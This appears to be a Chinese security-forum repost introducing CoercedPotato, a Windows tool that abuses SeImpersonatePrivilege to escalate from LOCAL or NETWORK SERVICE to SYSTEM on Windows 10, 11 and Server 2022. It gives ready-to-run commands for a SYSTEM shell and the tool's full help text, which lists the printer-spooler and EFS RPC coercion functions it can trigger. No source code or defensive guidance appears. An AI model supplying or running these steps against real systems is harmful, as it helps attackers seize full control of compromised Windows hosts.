|
|
hackvens 潇湘信安 2023-12-07 05:30 发表于湖南
工具简介
通过在Windows 10、Windows 11和Server 2022上滥用SeImpersonatePrivilege特权可以从LOCAL/NETWORK SERVICE提升为SYSTEM。
工具使用
- 非常快速POC:
- .\CoercedPotato.exe -c whoami
- 交互式shell的PoC:
- .\CoercedPotato.exe -c cmd.exe
可以使用--help选项检查帮助消息。
- CoercedPotato is an automated tool for privilege escalation exploit using SeImpersonatePrivilege or SeImpersonatePrimaryToken.
- Usage: .\CoercedPotato.exe [OPTIONS]
- Options:
- -h,--help Print this help message and exit
- -c,--command TEXT REQUIRED Program to execute as SYSTEM (i.e. cmd.exe)
- -i,--interface TEXT Optionnal interface to use (default : ALL) (Possible values : ms-rprn, ms-efsr
- -n,--exploitId INT Optionnal exploit ID (Only usuable if interface is defined)
- -> ms-rprn :
- [0] RpcRemoteFindFirstPrinterChangeNotificationEx()
- [1] RpcRemoteFindFirstPrinterChangeNotification()
- -> ms-efsr
- [0] EfsRpcOpenFileRaw()
- [1] EfsRpcEncryptFileSrv()
- [2] EfsRpcDecryptFileSrv()
- [3] EfsRpcQueryUsersOnFile()
- [4] EfsRpcQueryRecoveryAgents()
- [5] EfsRpcRemoveUsersFromFile()
- [6] EfsRpcAddUsersToFile()
- [7] EfsRpcFileKeyInfo() # NOT WORKING
- [8] EfsRpcDuplicateEncryptionInfoFile()
- [9] EfsRpcAddUsersToFileEx()
- [10] EfsRpcFileKeyInfoEx() # NOT WORKING
- [11] EfsRpcGetEncryptedFileMetadata()
- [12] EfsRpcEncryptFileExSrv()
- [13] EfsRpcQueryProtectors()
-
- -f,--force BOOLEAN Force all RPC functions even if it says 'Exploit worked!' (Default value : false)
- --interactive BOOLEAN Set wether the process should be run within the same shell or open a new window. (Default value : true)
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|
发表于 2023-12-8 23:14:07